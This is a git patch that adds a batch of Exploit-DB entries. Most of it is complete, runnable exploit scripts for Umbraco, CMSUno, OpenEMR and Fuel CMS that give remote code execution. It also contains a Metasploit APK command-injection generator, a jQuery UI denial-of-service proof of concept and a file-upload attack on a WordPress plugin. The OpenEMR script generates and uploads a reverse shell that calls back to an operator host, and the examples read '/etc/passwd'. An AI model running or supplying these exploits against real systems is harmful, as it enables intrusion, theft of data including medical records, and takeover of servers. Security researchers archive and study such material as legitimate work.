From 82075ed5ca7dd4eee3a06709b90c6e24d18279bb Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 29 Jan 2021 05:01:58 +0000 Subject: [PATCH] DB: 2021-01-29 10 changes to exploits/shellcodes jQuery UI 1.12.1 - Denial of Service (DoS) Metasploit Framework 6.0.11 - msfvenom APK template command injection fuelCMS 1.4.1 - Remote Code Execution fuel CMS 1.4.1 - Remote Code Execution (1) OpenEMR 5.0.1 - Remote Code Execution OpenEMR 5.0.1 - Remote Code Execution (1) EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated) OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2) Fuel CMS 1.4.1 - Remote Code Execution (2) Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution --- exploits/aspx/webapps/49488.py | 68 +++++++++++++++++ exploits/linux/webapps/47138.py | 2 +- exploits/multiple/dos/49489.html | 36 +++++++++ exploits/multiple/local/49491.py | 49 ++++++++++++ exploits/php/webapps/48515.py | 2 +- exploits/php/webapps/49484.txt | 12 +++ exploits/php/webapps/49485.rb | 125 +++++++++++++++++++++++++++++++ exploits/php/webapps/49486.rb | 98 ++++++++++++++++++++++++ exploits/php/webapps/49487.rb | 51 +++++++++++++ exploits/php/webapps/49490.txt | 50 +++++++++++++ files_exploits.csv | 12 ++- 11 files changed, 501 insertions(+), 4 deletions(-) create mode 100755 exploits/aspx/webapps/49488.py create mode 100644 exploits/multiple/dos/49489.html create mode 100755 exploits/multiple/local/49491.py create mode 100644 exploits/php/webapps/49484.txt create mode 100755 exploits/php/webapps/49485.rb create mode 100755 exploits/php/webapps/49486.rb create mode 100755 exploits/php/webapps/49487.rb create mode 100644 exploits/php/webapps/49490.txt diff --git a/exploits/aspx/webapps/49488.py b/exploits/aspx/webapps/49488.py new file mode 100755 index 000000000..d9e940c70 --- /dev/null +++ b/exploits/aspx/webapps/49488.py @@ -0,0 +1,68 @@ +# Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) +# Date: 2020-03-28 +# Exploit Author: Alexandre ZANNI (noraj) +# Based on: https://www.exploit-db.com/exploits/46153 +# Vendor Homepage: http://www.umbraco.com/ +# Software Link: https://our.umbraco.com/download/releases +# Version: 7.12.4 +# Category: Webapps +# Tested on: Windows IIS +# Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig + +import requests +import re +import argparse + +from bs4 import BeautifulSoup + +parser = argparse.ArgumentParser(prog='exploit.py', + description='Umbraco authenticated RCE', + formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80)) +parser.add_argument('-u', '--user', metavar='USER', type=str, + required=True, dest='user', help='username / email') +parser.add_argument('-p', '--password', metavar='PASS', type=str, + required=True, dest='password', help='password') +parser.add_argument('-i', '--host', metavar='URL', type=str, required=True, + dest='url', help='root URL') +parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True, + dest='command', help='command') +parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False, + dest='arguments', help='arguments', default='') +args = parser.parse_args() + +# Payload +payload = """\ +public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \ +""" % (args.arguments, args.command) + +login = args.user +password = args.password +host = args.url + +# Process Login +url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin" +loginfo = { "username": login, "password": password} +s = requests.session() +r2 = s.post(url_login,json=loginfo) + +# Go to vulnerable web page +url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx" +r3 = s.get(url_xslt) + +soup = BeautifulSoup(r3.text, 'html.parser') +VIEWSTATE = soup.find(id="__VIEWSTATE")['value'] +VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'] +UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'] +headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN} +data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE, + "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR, + "ctl00$body$xsltSelection": payload, + "ctl00$body$contentPicker$ContentIdValue": "", + "ctl00$body$visualizeDo": "Visualize+XSLT" } + +# Launch the attack +r4 = s.post(url_xslt, data=data, headers=headers) +# Filter output +soup = BeautifulSoup(r4.text, 'html.parser') +CMDOUTPUT = soup.find(id="result").getText() +print(CMDOUTPUT) \ No newline at end of file diff --git a/exploits/linux/webapps/47138.py b/exploits/linux/webapps/47138.py index 971baab76..ec31e177a 100755 --- a/exploits/linux/webapps/47138.py +++ b/exploits/linux/webapps/47138.py @@ -1,4 +1,4 @@ -# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution +# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1) # Date: 2019-07-19 # Exploit Author: 0xd0ff9 # Vendor Homepage: https://www.getfuelcms.com/ diff --git a/exploits/multiple/dos/49489.html b/exploits/multiple/dos/49489.html new file mode 100644 index 000000000..18c9ddb56 --- /dev/null +++ b/exploits/multiple/dos/49489.html @@ -0,0 +1,36 @@ +# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS) +# Date: 20 Jan, 2021 +# Exploit Author: Rafael Cintra Lopes +# Vendor Homepage: https://jqueryui.com/ +# Software Link: https://jqueryui.com/download/ +# Version: <= 1.12.1 +# CVE : CVE-2020-28488 + + + + + + + DoS - jQuery UI 1.12.1 + + +

DoS - jQuery UI 1.12.1

+ +
+ +
+ +

PoC by Rafael Cintra Lopes

+ + + + + + + \ No newline at end of file diff --git a/exploits/multiple/local/49491.py b/exploits/multiple/local/49491.py new file mode 100755 index 000000000..591921817 --- /dev/null +++ b/exploits/multiple/local/49491.py @@ -0,0 +1,49 @@ +# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection +# Exploit Author: Justin Steven +# Vendor Homepage: https://www.metasploit.com/ +# Software Link: https://www.metasploit.com/ +# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0 +# CVE : CVE-2020-7384 + +#!/usr/bin/env python3 +import subprocess +import tempfile +import os +from base64 import b64encode + +# Change me +payload = 'echo "Code execution as $(id)" > /tmp/win' + +# b64encode to avoid badchars (keytool is picky) +payload_b64 = b64encode(payload.encode()).decode() +dname = f"CN='|echo {payload_b64} | base64 -d | sh #" + +print(f"[+] Manufacturing evil apkfile") +print(f"Payload: {payload}") +print(f"-dname: {dname}") +print() + +tmpdir = tempfile.mkdtemp() +apk_file = os.path.join(tmpdir, "evil.apk") +empty_file = os.path.join(tmpdir, "empty") +keystore_file = os.path.join(tmpdir, "signing.keystore") +storepass = keypass = "password" +key_alias = "signing.key" + +# Touch empty_file +open(empty_file, "w").close() + +# Create apk_file +subprocess.check_call(["zip", "-j", apk_file, empty_file]) + +# Generate signing key with malicious -dname +subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass, + "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname]) + +# Sign APK using our malicious dname +subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file, + "-storepass", storepass, "-keypass", keypass, apk_file, key_alias]) + +print() +print(f"[+] Done! apkfile is at {apk_file}") +print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null") \ No newline at end of file diff --git a/exploits/php/webapps/48515.py b/exploits/php/webapps/48515.py index 7725a1173..eb4e98818 100755 --- a/exploits/php/webapps/48515.py +++ b/exploits/php/webapps/48515.py @@ -1,4 +1,4 @@ -# Title: OpenEMR 5.0.1 - Remote Code Execution +# Title: OpenEMR 5.0.1 - Remote Code Execution (1) # Exploit Author: Musyoka Ian # Date: 2020-05-25 # Title: OpenEMR < 5.0.1 - Remote Code Execution diff --git a/exploits/php/webapps/49484.txt b/exploits/php/webapps/49484.txt new file mode 100644 index 000000000..c7a7c6e7e --- /dev/null +++ b/exploits/php/webapps/49484.txt @@ -0,0 +1,12 @@ +# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting +# Exploit Author: Mahendra Purbia +# Vendor Homepage: http://egavilanmedia.com +# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/ +# Version: 1.0 +# Tested on: Windows 10 + +Vulnerable Parameters: Full Name +Steps for reproduce: + 1. go to http://localhost/PHPCRUD/ + 2. now click on "add new record" and fill the details (in first name name use :"> -c [-u ] [-p ] [-t ] [--debug] + #{__FILE__} -H | --help + + Options: + -r , --root-url Root URL (base path) including HTTP scheme, port and root folder + -u , --user user name (if not default: cmsuno) + -p , --pass User password (if not default: 654321) + -c , --command Command to execute on the target + -t , --technique Technique: exploiting 'user' param (default, with output) or 'lang' param (blind) + --debug Display arguments + -h, --help Show this screen + + Examples: + #{__FILE__} -r http://example.org -c id + #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang +DOCOPT + +# Get anti-CSRF token +def get_unox(client, auth_status) + print '[*] Fetching anti-CSRF token: ' + res = client.get(LOGIN_URL) + case auth_status + when false + regexp = /name="unox" value="([a-f0-9]{32}?)"/ + when true + regexp = /Unox='([a-f0-9]{32}?)'/ + end + token = regexp.match(res.body).captures[0].chomp + puts token + return token +end + +def login(client, user, pass) + data = { + 'unox' => get_unox(client, false), + 'user' => user, + 'pass' => pass, + } + puts '[*] Logging in' + res = client.post(LOGIN_URL, data) + return res.body +end + +def exploit(client, user, pass, cmd, tech) + payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// " + case tech + when 'user' + data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en" + when 'lang' + data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}" + else + raise 'Wrong exploitation technique argument value' + end + headers = { + 'X-Requested-With' => 'XMLHttpRequest' + } + #client.proxy = 'http://localhost:8080' + puts "[*] Starting exploitation, using '#{tech}' param technique" + client.post(VULNERABLE_URL, data, headers) + # Login again to trigger uno/password.php + clnt2 = HTTPClient.new + return login(clnt2, user, pass).lines[..-2].join +end + +begin + args = Docopt.docopt(doc) + pp args if args['--debug'] + + username = args['--user'] || 'cmsuno' + password = args['--pass'] || '654321' + technique = args['--technique'] || 'user' + LOGIN_URL = "#{args['--root-url']}/uno.php" + VULNERABLE_URL = "#{args['--root-url']}/uno/central.php" + + clnt = HTTPClient.new + login(clnt, username, password) + output = exploit(clnt, username, password, args['--command'], technique) + print '[*] Command output:' + case technique + when 'user' + puts "\n#{output}" + when 'lang' + puts ' blind RCE, no output with this exploitation technique' + end +rescue Docopt::Exit => e + puts e.message +end \ No newline at end of file diff --git a/exploits/php/webapps/49486.rb b/exploits/php/webapps/49486.rb new file mode 100755 index 000000000..e28ee85e8 --- /dev/null +++ b/exploits/php/webapps/49486.rb @@ -0,0 +1,98 @@ +# Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2) +# Exploit Author: Alexandre ZANNI +# Date: 2020-07-16 +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz +# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile +# Version: < 5.0.1 (Patch 4) +# Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3 +# References: https://www.exploit-db.com/exploits/48515 + +#!/usr/bin/env ruby + +require 'httpclient' +require 'docopt' + +shell_name = 'shell4.php' +user = 'openemr_admin' +password = 'xxxxxx' +payload = 'php/reverse_php' +lhost = '10.10.15.201' +lport = 8888 + +doc = <<~DOCOPT + OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution + + Usage: + #{__FILE__} manual --root-url --shell --user --password [--debug] + #{__FILE__} semi-auto --root-url --user --password --payload --lhost --lport [--debug] + #{__FILE__} auto --root-url --user --password --lhost --lport [--debug] + #{__FILE__} -H | --help + + Options: + -r , --root-url Root URL (base path) including HTTP scheme, port and root folder + -s , --shell Filename of the PHP reverse shell payload + -u , --user Username of the admin + -p , --password Password of the admin + -m , --payload Metasploit PHP payload + -h , --lhost Reverse shell local host + -t , --lport Reverse shell local port + --debug Display arguments + -H, --help Show this screen + + Examples: + #{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123 + #{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888 + #{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999 +DOCOPT + +begin + args = Docopt.docopt(doc) + pp args if args['--debug'] + if args['manual'] + shell_name = File.basename(args['--shell']) + shell_path = args['--shell'] + else + shell_name = "tmp#{rand(1000)}.php" + shell_path = shell_name + end + if args['semi-auto'] + payload = args['--payload'] + else + payload = 'php/reverse_php' + end + # Authentication data + uri_1 = URI("#{args['--root-url']}/interface/main/main_screen.php?auth=login&site=default") + data_1= { + 'new_login_session_management' => '1', + 'authProvider' => 'Default', + 'authUser' => args['--user'], + 'clearPass' => args['--password'], + 'languageChoice' => '1' + } + # Reverse shell data + unless args['manual'] + puts "[+] Generating the reverse shell payload: #{shell_name}" + %x(msfvenom -p #{payload} LHOST=#{args['--lhost']} LPORT=#{args['--lport']} -f raw > #{shell_name}) + end + data_2 = { + 'site' => 'default', + 'mode' => 'save', + 'docid' => shell_name, + 'content' => File.read(shell_path)} + uri_2 = URI("#{args['--root-url']}/portal/import_template.php?site=default") + uri_3 = URI("#{args['--root-url']}/portal/#{shell_name}") + + clnt = HTTPClient.new + + puts '[+] Authenticating' + clnt.post(uri_1, data_1) + + puts '[+] Uploading the reverse shell' + clnt.post(uri_2, data_2) + + puts "[+] Executing the reverse shell: #{args['--root-url']}/portal/#{shell_name}" + clnt.get(uri_3) +rescue Docopt::Exit => e + puts e.message +end \ No newline at end of file diff --git a/exploits/php/webapps/49487.rb b/exploits/php/webapps/49487.rb new file mode 100755 index 000000000..445e07719 --- /dev/null +++ b/exploits/php/webapps/49487.rb @@ -0,0 +1,51 @@ +# Title: Fuel CMS 1.4.1 - Remote Code Execution (2) +# Exploit Author: Alexandre ZANNI +# Date: 2020-11-14 +# Vendor Homepage: https://www.getfuelcms.com/ +# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 +# Version: <= 1.4.1 +# Tested on: Ubuntu 16.04 +# CVE : CVE-2018-16763 +# References: https://www.exploit-db.com/exploits/47138 + +#!/usr/bin/env ruby + +require 'httpclient' +require 'docopt' + +# dirty workaround to ignore Max-Age +# https://github.com/nahi/httpclient/issues/242#issuecomment-69013932 +$VERBOSE = nil + +doc = <<~DOCOPT + Fuel CMS 1.4 - Remote Code Execution + + Usage: + #{__FILE__} + #{__FILE__} -h | --help + + Options: + Root URL (base path) including HTTP scheme, port and root folder + The system command to execute + -h, --help Show this screen + + Examples: + #{__FILE__} http://example.org id + #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd' +DOCOPT + +def exploit(client, root_url, cmd) + url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'" + + res = client.get(url) + + /system(.+?)
'], args['']) +rescue Docopt::Exit => e + puts e.message +end \ No newline at end of file diff --git a/exploits/php/webapps/49490.txt b/exploits/php/webapps/49490.txt new file mode 100644 index 000000000..b52ff47b7 --- /dev/null +++ b/exploits/php/webapps/49490.txt @@ -0,0 +1,50 @@ +# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution +# Exploit Author: ABDO10 +# Date : Jan - 28 - 2021 +# Google Dork : inurl:"/wp-content/plugins/super-forms/" +# Vendor Homepage : https://renstillmann.github.io/super-forms/#/ +# Version : All (<= 4.9.X) +# data in http request : + +POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1 + <=== exploit end point +Host: localhost +User-Agent: UserAgent +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; +boundary=---------------------------423513681827540048931513055996 +Content-Length: 7058 +Origin: localhost +Connection: close +Referer: localhost +Cookie: + +-----------------------------423513681827540048931513055996 +Content-Disposition: form-data; name="accept_file_types" + +jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <======= +inject extension (|PHP4) to validate file to upload +-----------------------------423513681827540048931513055996 +Content-Disposition: form-data; name="max_file_size" + +8000000 +-----------------------------423513681827540048931513055996 +Content-Disposition: form-data; name="image_library" + +0 +-----------------------------423513681827540048931513055996 +Content-Disposition: form-data; name="files[]"; +filename="filename.(extension)" <==== inject code extension (.php4) +for example +Content-Type: application/pdf + +Evil codes to be uploaded + +-----------------------------423513681827540048931513055996-- + +# Uploaded Malicious File can be Found in : +/wp-content/uploads/superforms/2021/01//filename.php4 +u can get from server reply . \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5ffa51ea8..d9cde1dd8 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6767,6 +6767,7 @@ id,file,description,date,author,type,platform,port 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows, 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple, 49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",2021-01-04,stresser,dos,windows, +49489,exploits/multiple/dos/49489.html,"jQuery UI 1.12.1 - Denial of Service (DoS)",2021-01-28,"Rafael Cintra Lopes",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11245,6 +11246,7 @@ id,file,description,date,author,type,platform,port 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java, 49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",2021-01-11,rootabeta,local,windows, 49453,exploits/windows/local/49453.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation",2021-01-22,LiquidWorm,local,windows, +49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",2021-01-28,"Justin Steven",local,multiple, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42518,7 +42520,7 @@ id,file,description,date,author,type,platform,port 47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux, 47132,exploits/linux/webapps/47132.txt,"Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting",2019-07-17,"Sarath Nair",webapps,linux, 47136,exploits/linux/webapps/47136.txt,"WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting",2019-07-18,LiquidWorm,webapps,linux, -47138,exploits/linux/webapps/47138.py,"fuelCMS 1.4.1 - Remote Code Execution",2019-07-19,0xd0ff9,webapps,linux, +47138,exploits/linux/webapps/47138.py,"fuel CMS 1.4.1 - Remote Code Execution (1)",2019-07-19,0xd0ff9,webapps,linux, 47139,exploits/linux/webapps/47139.txt,"Web Ofisi E-Ticaret 3 - 'a' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux, 47140,exploits/linux/webapps/47140.txt,"Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux, 47141,exploits/linux/webapps/47141.txt,"Web Ofisi Emlak 2 - 'ara' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux, @@ -43183,7 +43185,7 @@ id,file,description,date,author,type,platform,port 48509,exploits/php/webapps/48509.txt,"WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php, 48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php, 48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php, -48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution",2020-05-26,"Musyoka Ian",webapps,php, +48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution (1)",2020-05-26,"Musyoka Ian",webapps,php, 48516,exploits/php/webapps/48516.txt,"Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)",2020-05-26,"Kamaljeet Kumar",webapps,php, 48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php, 48519,exploits/linux/webapps/48519.py,"Pi-hole 4.4.0 - Remote Code Execution (Authenticated)",2020-05-26,Photubias,webapps,linux, @@ -43677,3 +43679,9 @@ id,file,description,date,author,type,platform,port 49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple, 49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby, 49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby, +49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",2021-01-28,"Mahendra Purbia",webapps,php, +49485,exploits/php/webapps/49485.rb,"CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated)",2021-01-28,"Alexandre ZANNI",webapps,php, +49486,exploits/php/webapps/49486.rb,"OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)",2021-01-28,"Alexandre ZANNI",webapps,php, +49487,exploits/php/webapps/49487.rb,"Fuel CMS 1.4.1 - Remote Code Execution (2)",2021-01-28,"Alexandre ZANNI",webapps,php, +49488,exploits/aspx/webapps/49488.py,"Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)",2021-01-28,"Alexandre ZANNI",webapps,aspx, +49490,exploits/php/webapps/49490.txt,"WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution",2021-01-28,ABDO10,webapps,php,